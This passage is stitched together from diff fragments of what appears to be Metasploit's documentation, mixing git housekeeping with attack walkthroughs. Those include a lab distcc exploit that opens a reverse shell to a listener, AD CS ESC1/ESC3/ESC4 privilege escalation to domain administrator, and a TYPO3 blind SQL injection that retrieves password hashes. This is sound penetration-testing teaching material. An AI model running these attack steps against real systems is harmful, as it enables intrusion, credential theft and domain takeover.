mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort
```
Count off how many you want to keep at the end, do the arithmetic, and tack on another couple pipes to catch everything that's more than two weeks old. These are the merged branches that nobody's likely to miss.
```
mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort | head -45 | sed "s/^.*origin\///" > /tmp/merged_to_delete.txt
```
Pull the trigger:
```
mazikeen:./msf-prune$ for b in `cat /tmp/merged_to_delete.txt`; do echo Deleting $b && git push origin :$b; done
```
Note that we still have our tarball, so if we need to reinstate any of these branches, just need to re-push.
@@ -31,14 +31,14 @@ You can inspect exactly what commits are contained in this merge with the follow
Like so:
```
$ git log bad-merge...bad-merge~ --oneline
3996557 Fix conflcit lib/msf/util/exe.rb
6296c4f Merge pull request #9 from tabassassin/retab/pr/2320
d0a3ea6 Retab changes for PR #2320
bff7d0e Merge for retab
4c9e6a8 Default to exe-small
```
The syntax is a little wacky, but this is saying, "Show me all the commit hashes that occur from the `bad-merge` point to one back from `bad-merge`" (in other words, from right before `bad-merge` was merged). That's what the tilde (~) means. You could also use `bad-merge^` or `bad-merge^1`; they're all equivalent.
@@ -4,9 +4,9 @@ If you're in the business of writing or collecting Metasploit modules that aren'
You must first set up a directory structure that fits with Metasploit's expectations of path names. What this typically means is that you should first create an "exploits" directory structure, like so:
```bash
mkdir -p $HOME/.msf4/modules/exploits
```
If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll want to `mkdir` those as well.
@@ -14,9 +14,9 @@ If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll
Modules are sorted by (somewhat arbitrary) categories. These can be anything you like; I usually use `test` or `private`, but if you are developing a module with an eye toward providing it to the main Metasploit distribution, you will want to mirror the real module path. For example:
... if you are developing a file format exploit for Windows.
@@ -36,7 +36,7 @@ For full details:
If you already have msfconsole running, use a `reload_all` command to pick up your new modules. If not, just start msfconsole and they'll be picked up automatically. If you'd like to test with something generic, I have a module posted up as a gist, here: <https://gist.github.com/todb-r7/5935519>, so let's give it a shot:
@@ -4,7 +4,7 @@ Recent changes to HTTP and HTTPS communications in both Meterpreter and its stag
The Windows API comes with two ways to talk via HTTP/S, they are [WinInet][] and [WinHTTP][]. The APIs are consumed in a similar fashion; many of the functions in each have the same interface, or are at least close enough to make a transition between the two rather trivial. However, there are some underlying differences that are important.
The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibility of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.
[WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [[Paranoid Mode|./meterpreter-paranoid-mode.md]] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.
@@ -22,7 +22,7 @@ As indicated in a [blog post on MSDN][msdn_winhttp]:
What this means is that from Windows 7 onwards, the underlying [WinHTTP][] implementation requires proper HTTP/1.1 support from any proxies that are used. If a proxy uses HTTP/1.0, such as Squid 2.7, and requires `Keep-Alive` support, such as NTLM authentication, then [WinHTTP][] will refuse to talk to it. Instead of downgrading, it expects a purely RFC-compliant implementation and will return a `407` error to the client. This means that for Meterpreter to work, [WinHTTP][] can't be used.
In order to avoid this issue, [extra work][wininet_fallback] has been done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.
To sum up, Meterpreter will use [WinHTTP][] where it can. If it can't, it'll fall back to [WinInet][] _unless_ paranoid mode is enabled.
@@ -27,7 +27,7 @@ If someone has library changes that cannot be merged to master, we cannot hang o
## Rescuing unstable modules
If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similar `git checkout` to grab the file and then `git mv` it to the right spot again.
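The checkout-and-move dance can be rehearsed end to end in a scratch repository (all paths and the tag name below are placeholders, not the real unstable-repo layout):

```shell
# Scratch repo: commit a module, delete it, then rescue it from the old ref
repo=$(mktemp -d) && cd "$repo" && git init -q .
mkdir -p old/location modules/exploits/example
echo '# rescued module' > old/location/rescue_me.rb
git add -A
git -c user.email=t@example.com -c user.name=t commit -qm "snapshot"
git tag unstable-snapshot
git rm -q old/location/rescue_me.rb
git -c user.email=t@example.com -c user.name=t commit -qm "module dropped"

# Restore the file from the old ref, then git mv it into its new home
git checkout unstable-snapshot -- old/location/rescue_me.rb
git mv old/location/rescue_me.rb modules/exploits/example/rescue_me.rb
```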
Depending on your skill level - if you have no experience with Metasploit, the following resources may be a better starting point:
Assuming you have installed Metasploit, either with the official Rapid7 nightly installers or through Kali, you can use the `msfconsole` command to open Metasploit:
Metasploit is based around the concept of [[modules]]. The most commonly used module types are:
- Auxiliary - Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks
- Exploit - Exploit modules leverage vulnerabilities in a manner that allows the framework to execute arbitrary code on the target host
- Payloads - Arbitrary code that can be executed on a remote target to perform a task, such as creating users, opening shells, etc
- Post - Post modules are used after a machine has been compromised. They perform useful tasks such as gathering, collecting, or enumerating data from a session.
You can use the `search` command to search for modules:
```msf
msf6 > search type:auxiliary http html title tag
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/title normal No HTTP HTML Title Tag Content Grabber
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/title
msf6 >
```
You can `use` a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently
active module:
```msf
msf6 > use auxiliary/scanner/http/title
msf6 auxiliary(scanner/http/title) >
```
### Running Auxiliary modules
Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks. For instance, a module
extracting the HTTP title from a server:
```msf
msf6 > use auxiliary/scanner/http/title
msf6 auxiliary(scanner/http/title) >
```
Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
```msf
msf6 auxiliary(scanner/http/title) > show options
Module options (auxiliary/scanner/http/title):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SHOW_TITLES true yes Show the titles on the console as they are grabbed
SSL false no Negotiate SSL/TLS for outgoing connections
STORE_NOTES true yes Store the captured information in notes. Use "notes -t http.title" to view
TARGETURI / yes The base path
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/http/title) >
```
To set a module option, use the `set` command. We will set the `RHOSTS` option - which represents the target host(s) that
the module will run against:
```msf
msf6 auxiliary(scanner/http/title) > set RHOSTS google.com
RHOSTS => google.com
```
The `run` command will run the module against the target, showing the target's HTTP title:
```msf
msf6 auxiliary(scanner/http/title) > run
[+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Metasploit 6 added support for setting module options as part of the `run` command. For instance, setting
both `RHOSTS` and enabling `HttpTrace` functionality:
```msf
msf6 auxiliary(scanner/http/title) > run rhosts=google.com httptrace=true
####################
# Request:
####################
GET / HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
For instance - targeting a vulnerable Metasploitable2 VM and using the `unix/misc/distcc_exec` module:
```msf
msf6 > use unix/misc/distcc_exec
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) >
```
Exploit modules will generally require, at a minimum, the following options to be set:
- `RHOSTS` - The remote target host(s)
- `LHOST` - The listen address. **Important** This may need to be set to your `tun0` IP address or similar, if you are connecting to your target over a VPN
- `PAYLOAD` - The code to be executed after an exploit is successful. For instance creating a user, or a Metasploit session. Often this can be left as the default value, but may sometimes require configuration
Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
```msf
msf6 exploit(unix/misc/distcc_exec) > options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3632 yes The target port (TCP)
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/misc/distcc_exec) >
```
For this scenario you can manually set each of the required option values (`RHOST`, `LHOST`, and optionally `PAYLOAD`):
```msf
msf6 exploit(unix/misc/distcc_exec) > set rhost 192.168.123.133
rhost => 192.168.123.133
msf6 exploit(unix/misc/distcc_exec) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
```
The `run` command will run the module against the target; the aliased `exploit` command will perform the same action:
```msf
msf6 exploit(unix/misc/distcc_exec) > run
[+] sh -c '(sleep 4375|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.123.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BmpMGFX6NDVlh5h0;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "BmpMGFX6NDVlh5h0\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.133:48578) at 2023-09-21 14:42:42 +0100
whoami
daemon
```
Metasploit 6 also supports setting options as part of the `run` command:
```msf
msf6 exploit(unix/misc/distcc_exec) > run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse
[+] sh -c '(sleep 4305|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.123.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo QqL1Uzom6eBFilyL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "QqL1Uzom6eBFilyL\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.133:52314) at 2023-09-21 13:52:40 +0100
From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. However,
whilst the issuing CAs allow any authenticated user to enroll in this certificate, the certificate template permissions
prevent anyone but Domain Administrators and Enterprise Admins from being able to enroll in this certificate template.
At that point you probably don't need to elevate your privileges any higher, so this certificate template isn't that
useful for us.
Moving onto the next certificate template we see that ESC1-Template is vulnerable to the ESC1 attack, has permissions on
the template itself that allow for enrollment by any authenticated domain user, and has one issuing CA, daforest-WIN-
BR0CCBA815B-CA, available at WIN-BR0CCBA815B.daforest.com, which allows enrollment by any authenticated user. This means
that any user who is authenticated to the domain can utilize this template with a ESC1 attack to elevate their
privileges.
Looking at ESC2-Template we can see the same story however this time the template is vulnerable to an ESC2 attack.
ESC3-Template1 is also the same but is vulnerable to ESC3_TEMPLATE_1 attacks, and ESC3-Template2 is the same but
vulnerable to ESC3_TEMPLATE_2 attacks.
We also see that the User template is vulnerable to ESC3_TEMPLATE_2 attacks and the fact that it is enrollable from
Domain Users and that daforest-WIN-BR0CCBA815B-CA allows enrollment in it by any authenticated user confirms the theory
that this can be exploited by any authenticated attacker for an ESC3_TEMPLATE_2 attack.
Another interesting one to note is the Machine template, which allows any domain-joined computer to enroll in it, and
whose issuing CA allows any authenticated user to request it.
With this we now have a list of certificates that can be utilized for privilege escalation. The next step is to use the
`icpr_cert` module to request certificates for authentication using the vulnerable certificate templates.
# Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator
Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can.
Luckily we can also do this with the `icpr_cert` module. We just need to also set the `ALT_SID` and `ALT_UPN` options to
specify who we would like to authenticate as instead. Note that this only works with certificate templates that are
vulnerable to ESC1 due to having the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag set.
If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can
quickly set this up:
```msf
msf6 > use auxiliary/admin/dcerpc/icpr_cert
@@ -327,10 +352,12 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
SMBDomain => DAFOREST
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
SMBPass => normalpass
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
SMBUser => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
SMBDomain DAFOREST no The Windows domain to use for authentication
SMBPass normalpass no The password for the specified username
SMBUser normaluser no The username to authenticate as
Auxiliary action:
@@ -521,18 +549,27 @@ We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket grant
domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.
# Exploiting ESC3 To Gain Domain Administrator Privileges
To exploit ESC3 vulnerable templates we will use a similar process to
[[ESC2|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc2-to-gain-domain-administrator-privileges]] templates but
with slightly different steps. First, let's return to the earlier output where we can find several templates that are
vulnerable to ESC3 attacks. However we need to split them by attack vector. The reason is that the first half of this
attack needs to use the ESC3_TEMPLATE_1 vulnerable certificate templates to enroll in a certificate template that has
the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) that allows one to request certificates on behalf of other
principals (such as users or computers).
The second part of this attack will then require that we co-sign requests for another certificate using the certificate
that we just got, to then request a certificate that can authenticate to the domain on behalf of another user. To do
this we will need to look for certificates in the `ldap_esc_vulnerable_cert_finder` module which are labeled as being
vulnerable to the ESC3_TEMPLATE_2 attack.
The list of ESC3_TEMPLATE_1 vulnerable templates is pretty short and consists of a single template:
- ESC3-TEMPLATE-1 - Vulnerable to ESC3_TEMPLATE_1 and allows enrollment via any authenticated domain user.
ESC3_TEMPLATE_2 vulnerable templates are more plentiful though, and we can find a few that are of interest:
- SubCA - Again as mentioned earlier can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
- ESC3-Template2 - Enrollable via any authenticated domain user.
- User - Enrollable via any authenticated domain user.
- Administrator - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
- Machine - Likely no real overlap between Domain Computers and Authenticated Users, so probably not a viable vector.
- DomainController - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
@@ -572,10 +609,10 @@ Auxiliary action:
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
SMBUser => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
SMBPass => normalpass
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
SMBDomain => DAFOREST
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
@@ -606,7 +643,7 @@ host service type name content info
msf6 auxiliary(admin/dcerpc/icpr_cert) >
```
Next, we'll try to use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate template that is vulnerable to the ESC3_TEMPLATE_2 attack vector and that we are able to enroll in. We will use the `User` template for this:
```msf
msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.
# Getting A Kerberos Ticket
Once a certificate for a user has been claimed, that certificate can be used to issue a Kerberos ticket granting ticket
(TGT) which in turn can be used to authenticate to services.
# Exploiting ESC4 To Gain Domain Administrator Privileges
To exploit ESC4, we will require an account with write privileges over a certificate template object in Active
Directory. This involves finding an object with weak permissions defined within the `nTSecurityDescriptor` field. With
this object identified, we can modify it to reconfigure the template to be vulnerable to another ESC technique.
Ticket granting tickets can be requested using the [[kerberos/get_ticket|kerberos/get_ticket.md]] module by specifying
the `CERT_FILE` option. Take the certificate file from the last stage of the attack and set it as the `CERT_FILE`.
Certificates from Metasploit do not require a password, but if the certificate was generated from a source that added
one, it can be specified in the `CERT_PASSWORD` option. Set the `RHOSTS` datastore option to the Domain Controller, then
run the `GET_TGT` action.
First, we will use the `icpr_cert` module in an attempt to exploit ESC1 (by setting `ALT_UPN`). This fails because
the `ESC4-Test` certificate template does not allow the certificate's subject name to be supplied in the request (the
`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag is not set in the `msPKI-Certificate-Name-Flag` field).
```msf
msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
SMBUser => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
SMBPass => normalpass
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
CA => daforest-WIN-BR0CCBA815B-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC4-Test
CERT_TEMPLATE => ESC4-Test
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
ALT_UPN => Administrator@daforest.com
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 172.30.239.85
[-] 172.30.239.85:445 - There was an error while requesting the certificate.
[-] 172.30.239.85:445 - Denied by Policy Module
[-] 172.30.239.85:445 - Error details:
[-] 172.30.239.85:445 - Source: (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
[-] 172.30.239.85:445 - HRESULT: (0x80094812) CERTSRV_E_SUBJECT_EMAIL_REQUIRED: The email name is unavailable and cannot be added to the Subject or Subject Alternate name.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >
```
Next, we use the `ad_cs_cert_template` module to update the `ESC4-Test` certificate template. This process first makes a
backup of the certificate data that can be used later. Next, the local certificate template data is read and used to
update the object in Active Directory. The local certificate template data can be modified to set a custom security
descriptor.
```msf
msf6 auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME normaluser
USERNAME => normaluser
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD normalpass
PASSWORD => normalpass
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE ESC4-Test
CERT_TEMPLATE => ESC4-Test
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION UPDATE
ACTION => UPDATE
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
[*] Running module against 172.30.239.85
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.30.239.85:389 Getting root DSE
[+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com
[+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
@@ -216,9 +216,9 @@ We're excited to see your upcoming contributions of new modules, documentation,
Finally, we welcome your feedback on this guide, so feel free to reach out to us on [Slack] or open a [new issue]. For their significant contributions to this guide, we would like to thank [@kernelsmith], [@corelanc0d3r], and [@ffmike].
@@ -14,7 +14,7 @@ The following sites are great references for Git padawans and jedi alike:
* [Git is Easier Than You Think](http://nfarina.com/post/9868516270/git-is-simpler): A nice tutorial that breaks down one Git user's experience switching from Subversion.
* [PeepCode: Git](http://peepcode.com/products/git): A one-hour (not-free) screencast covering Git basics. Well-made and easy to follow.
* [GitHub Flow](http://scottchacon.com/2011/08/31/github-flow.html): Another great post from Scott Chacon describing a GitHub-based workflow for projects.
* [Getting Started with GitHub](https://pragprog.com/screencasts/v-scgithub/insider-guide-to-github): Also from GitHub's own Scott Chacon, this two-part screencast (one free and one paid) will walk you through the basics of using GitHub.
@@ -110,8 +110,8 @@ your day-to-day workflow with Git.
## Git in Bash
When using Git, it's very handy (read: pretty much mandatory) to have an ambient cue in your shell telling you what branch you're currently on. Use this function in your .profile/.bashrc/.bash_profile to enable you to place your Git branch in your prompt:
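The wiki's own helper may differ, but a minimal version of such a function looks like this (the function name and prompt format are illustrative):

```shell
# Print the current branch name, or nothing when not inside a git repo
git_current_branch() {
  git symbolic-ref --short HEAD 2>/dev/null
}

# Example use in a prompt (add to .bashrc):
#   PS1='[\u@\h \W $(git_current_branch)]\$ '
```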
@@ -12,7 +12,7 @@ A fork is when you snapshot someone else's codebase into your own repo, presumab
You only fork once, you clone as many times as you have machines on which you want to code, and you branch, commit, and push as often as you like (you don't always have to push; you can push later or not at all, but you'll have to push before doing a pull request, a.k.a. PR), and you submit a PR when you are ready. See below.
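The whole cycle can be rehearsed locally; in this sketch a bare repository stands in for your GitHub fork (all names are placeholders):

```shell
# "fork.git" stands in for your remote fork; clone it, branch, commit, push
work=$(mktemp -d)
git init -q --bare "$work/fork.git"
git clone -q "$work/fork.git" "$work/clone" 2>/dev/null
cd "$work/clone"
git checkout -q -b my-feature
echo '# new module' > module.rb
git add module.rb
git -c user.email=you@example.com -c user.name=You commit -qm "Add example module"
git push -q origin my-feature   # push before opening the PR
```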
@@ -4,7 +4,7 @@ News module extensions v5.3.2 and earlier for TYPO3 contain an SQL injection vul
## Vulnerable Application
In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the parameter name. This allows a user to inject values to an SQL query.
To exploit the vulnerability, the module generates requests and sets a value for `order` and `OrderByAllowed`, which gets passed to the SQL query. The requests are constructed to reorder the display of news articles based on a character matching. This allows a blind SQL injection to be performed to retrieve a username and password hash.
@@ -28,7 +28,7 @@ The value for query parameter `id` of the page that the news extension is runnin
- [ ] Verify if page is visible to unauthenticated user and note the id
- [ ] `./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost <rhost>; set id <id>; run'`
- [ ] Username and password hash should have been retrieved